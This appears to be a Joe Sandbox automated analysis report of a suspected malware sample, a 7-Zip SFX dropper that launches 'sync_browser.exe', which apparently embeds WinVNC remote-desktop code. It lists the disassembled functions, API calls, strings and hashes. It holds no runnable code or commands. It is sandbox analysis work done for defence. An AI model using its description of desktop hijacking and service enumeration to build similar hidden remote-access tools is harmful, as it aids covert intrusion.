Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94

Function 00408576 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 004085B0
GetClientRect.USER32(?,?), ref: 004085C2
PtInRect.USER32(?,?,?), ref: 004085D1

Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6

CallNextHookEx.USER32(?,?,?), ref: 004085F3

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ClientRect$CallHookKillNextScreenTimer
String ID:
API String ID: 3015594791-0
Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49

Function 0040411C Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
SetWindowTextW.USER32(?,?), ref: 0040417D
??3@YAXPAX@Z.MSVCRT(?), ref: 00404188

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: 98908755bd8ed0992c476b6f3ce6081942706090f74c84d9117027a34ed09b5c
Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
Opcode Fuzzy Hash: 98908755bd8ed0992c476b6f3ce6081942706090f74c84d9117027a34ed09b5c
Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98

Function 00407916 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407931
CreateFontIndirectW.GDI32(?), ref: 00407947
GetDlgItem.USER32(?,000004B5), ref: 0040795B
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69

Function 00401D8D Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00401D92
GetWindowRect.USER32(?,?), ref: 00401DAB
ScreenToClient.USER32(00000000,?), ref: 00401DB9
ScreenToClient.USER32(00000000,?), ref: 00401DC0

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5

Function 00411F01 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 480COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C

Strings

{D@, xrefs: 00411FD8, 00411FEF, 00412002, 00412187, 00412197, 00412276
(nA, xrefs: 00411F5C

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@
String ID: (nA${D@
API String ID: 613200358-2741945119
Opcode ID: df3286fe78e7f48938a3e8ffcc553a9ec3e0d021733a248802c20134ed18552d
Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
Opcode Fuzzy Hash: df3286fe78e7f48938a3e8ffcc553a9ec3e0d021733a248802c20134ed18552d
Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48

Function 004042EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00404310

Strings

^L@, xrefs: 004042EB, 0040430F
GUIFlags, xrefs: 004042EF

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: _wtol
String ID: GUIFlags$^L@
API String ID: 2131799477-2609156739
Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D

Function 00407EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00407EEF
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00407F17

Strings

(%d%s), xrefs: 00407EE9

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@wsprintf
String ID: (%d%s)
API String ID: 3815514257-2087557067
Opcode ID: 1c4aba05fd2f20ee9555bd842cb662e469eb9df77dbac8d081951f06a7fc6272
Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
Opcode Fuzzy Hash: 1c4aba05fd2f20ee9555bd842cb662e469eb9df77dbac8d081951f06a7fc6272
Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98

Function 004030EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(?), ref: 004030FB
GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

Strings

t1@, xrefs: 00403114

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: TextWindow$Length
String ID: t1@
API String ID: 1006428111-473456572
Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90

Function 00404464 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472

Strings

Could not allocate memory, xrefs: 0040446B
7-Zip SFX, xrefs: 00404466

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

Analysis Process: sync_browser.exePID: 7968, Parent PID: 6572COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.5%
Total number of Nodes:	1050
Total number of Limit Nodes:	45

Executed Functions

Function 00007FF7400236D0 Relevance: 98.9, APIs: 31, Strings: 25, Instructions: 895
librarythreadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00007FF74002371A
GetCurrentThreadId.KERNEL32 ref: 00007FF740023764
GetThreadDesktop.USER32 ref: 00007FF74002376C
_snprintf.LIBCMT ref: 00007FF740023820
free.LIBCMT ref: 00007FF740023862
free.LIBCMT ref: 00007FF74002386F
SleepEx.KERNELBASE ref: 00007FF7400238D5
timeGetTime.WINMM ref: 00007FF740023A99
EnterCriticalSection.KERNEL32 ref: 00007FF740023ADF
LeaveCriticalSection.KERNEL32 ref: 00007FF740023B11
GetComputerNameA.KERNEL32 ref: 00007FF740023BDC
gethostname.WS2_32 ref: 00007FF740023C8D
EnterCriticalSection.KERNEL32 ref: 00007FF740023F3D
CreateRectRgn.GDI32 ref: 00007FF740023F70
DeleteObject.GDI32 ref: 00007FF740023F9B
free.LIBCMT ref: 00007FF740023FA5
LeaveCriticalSection.KERNEL32 ref: 00007FF740023FAE

Part of subcall function 00007FF740097D90: EnterCriticalSection.KERNEL32(?,?,?,00007FF740023FBC), ref: 00007FF740097DA1
Part of subcall function 00007FF740097D90: SetThreadPriority.KERNEL32(?,?,?,00007FF740023FBC), ref: 00007FF740097DD5
Part of subcall function 00007FF740097D90: GetLastError.KERNEL32(?,?,?,00007FF740023FBC), ref: 00007FF740097DDF

GetTickCount.KERNEL32 ref: 00007FF7400241B3

Part of subcall function 00007FF74006A5B0: GetCurrentThreadId.KERNEL32 ref: 00007FF74006A5E1
Part of subcall function 00007FF74006A5B0: GetThreadDesktop.USER32 ref: 00007FF74006A5E9
Part of subcall function 00007FF74006A5B0: OpenInputDesktop.USER32 ref: 00007FF74006A5FC

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
CloseDesktop.USER32 ref: 00007FF740027C4A
Sleep.KERNEL32 ref: 00007FF740027C8F
FlushFileBuffers.KERNEL32 ref: 00007FF740027CBC
CloseHandle.KERNEL32 ref: 00007FF740027CE6
FlushFileBuffers.KERNEL32 ref: 00007FF740027D1E
CloseHandle.KERNEL32 ref: 00007FF740027D48
CloseDesktop.USER32 ref: 00007FF740027D9D
GetModuleFileNameA.KERNEL32 ref: 00007FF740027E0B
LoadLibraryA.KERNEL32 ref: 00007FF740027E5D

Part of subcall function 00007FF74006A3B0: GetCurrentThreadId.KERNEL32 ref: 00007FF74006A3E3
Part of subcall function 00007FF74006A3B0: GetThreadDesktop.USER32 ref: 00007FF74006A3EB
Part of subcall function 00007FF74006A3B0: GetUserObjectInformationA.USER32 ref: 00007FF74006A411

GetProcAddress.KERNEL32 ref: 00007FF740027E75
FreeLibrary.KERNEL32 ref: 00007FF740027E97

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncclient.cpp : client disconnected : %s (%hd), xrefs: 00007FF740027DE6
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
Could not connect using %s!, xrefs: 00007FF7400237F5
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : PostAddNewClient I, xrefs: 00007FF740023932
vncclient.cpp : authenticated connection, xrefs: 00007FF740023A76
Host name unavailable, xrefs: 00007FF740023CA1
\logging.dll, xrefs: 00007FF740027E38
vncclient.cpp : failed to close desktop, xrefs: 00007FF740027DA7
Could not connect to %s!, xrefs: 00007FF74002380D
WinVNC, xrefs: 00007FF740023C5C
application mode, xrefs: 00007FF740023DA2
( , xrefs: 00007FF740023CF4
vncclient.cpp : negotiated version, xrefs: 00007FF7400239F9
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029
LOGEXIT, xrefs: 00007FF740027E6B
- , xrefs: 00007FF740023D62
vncservice.cpp : OpenInputdesktop2 , xrefs: 00007FF740027C66
vncclient.cpp : sent pixel format to client, xrefs: 00007FF740023EF5
vncservice.cpp : PostAddNewClient failed, xrefs: 00007FF7400239CA
service mode, xrefs: 00007FF740023D82
vncclient.cpp : client connected : %s (%hd), xrefs: 00007FF74002374A
vncclient.cpp : PostAddNewClient II, xrefs: 00007FF740027F29
vncservice.cpp : SelectDesktop failed to close desktop, xrefs: 00007FF740027C54

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
API String ID: 459429253-3399855497
Opcode ID: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
Instruction ID: c7831661a1e8ee4fb68c30c16404564488e2934a2dd764cb54b026de526ed499
Opcode Fuzzy Hash: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
Instruction Fuzzy Hash: 56A29E26A0CA81C5E754FB25C848BFEB7A1FB84B94F854236DA1D477A9DF38E444C720

Function 00007FF740069BC0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 105
libraryloaderprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740069C03
GetProcAddress.KERNEL32 ref: 00007FF740069C1B
GetProcAddress.KERNEL32 ref: 00007FF740069C2E
GetSystemMetrics.USER32 ref: 00007FF740069C4E
GetCurrentProcessId.KERNEL32 ref: 00007FF740069C61
ProcessIdToSessionId.KERNEL32 ref: 00007FF740069C76
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF740069C85
Process32First.KERNEL32 ref: 00007FF740069CA4
CloseHandle.KERNEL32 ref: 00007FF740069CB1
FreeLibrary.KERNEL32 ref: 00007FF740069CBF

Strings

ProcessIdToSessionId, xrefs: 00007FF740069C21
explorer.exe, xrefs: 00007FF740069CD0
kernel32.dll, xrefs: 00007FF740069BF2
WTSGetActiveConsoleSessionId, xrefs: 00007FF740069C11

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
API String ID: 1881659197-3751679782
Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
Instruction ID: a1cb27de298f6e6f704efb6f218f62252460ef670fa25b78c18bd82b2d8af5f5
Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
Instruction Fuzzy Hash: 9A410935A1CB42C6EA64BB11A854169A3A5FF88BA0F844535D96E07BB8DF3CF505CB20

Function 00007FF740069EF0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessWindowStation.USER32 ref: 00007FF740069F30
GetUserObjectInformationA.USER32 ref: 00007FF740069F5E
GetLastError.KERNEL32 ref: 00007FF740069F64
SetLastError.KERNEL32 ref: 00007FF740069F6C
RevertToSelf.ADVAPI32 ref: 00007FF740069F79
GetUserNameA.ADVAPI32 ref: 00007FF74006A008
GetLastError.KERNEL32 ref: 00007FF74006A012
GetLastError.KERNEL32 ref: 00007FF74006A044

Strings

vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF740069FB7
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF740069F7F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF74006A06F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF74006A01F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF740069F3B
vncservice.cpp : getusername error %d, xrefs: 00007FF74006A04A
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF74006A094

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
API String ID: 3635673080-2232443292
Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
Instruction ID: 3d16bed8e3ebe4f073c1936e500eba5a23005048997565f1f91f36dd67fdfb83
Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
Instruction Fuzzy Hash: A8414A69F0C542C6EB51BB29F8402B9A3A2BF88348FC44431DA1D867B9DE7DF5458B20

Function 00007FF740009D00 Relevance: 15.2, APIs: 10, Instructions: 209
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.ADVAPI32 ref: 00007FF740009DBB
EnumServicesStatusA.ADVAPI32 ref: 00007FF740009E1D
GetLastError.KERNEL32 ref: 00007FF740009E2B
EnumServicesStatusA.ADVAPI32 ref: 00007FF740009E85
OpenServiceA.ADVAPI32 ref: 00007FF740009EB9
QueryServiceConfigA.ADVAPI32 ref: 00007FF740009ED7
GetLastError.KERNEL32 ref: 00007FF740009EE5
QueryServiceConfigA.ADVAPI32 ref: 00007FF740009F16
CloseServiceHandle.ADVAPI32 ref: 00007FF740009FCA
CloseServiceHandle.ADVAPI32 ref: 00007FF740009FF0

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
String ID:
API String ID: 3151975580-0
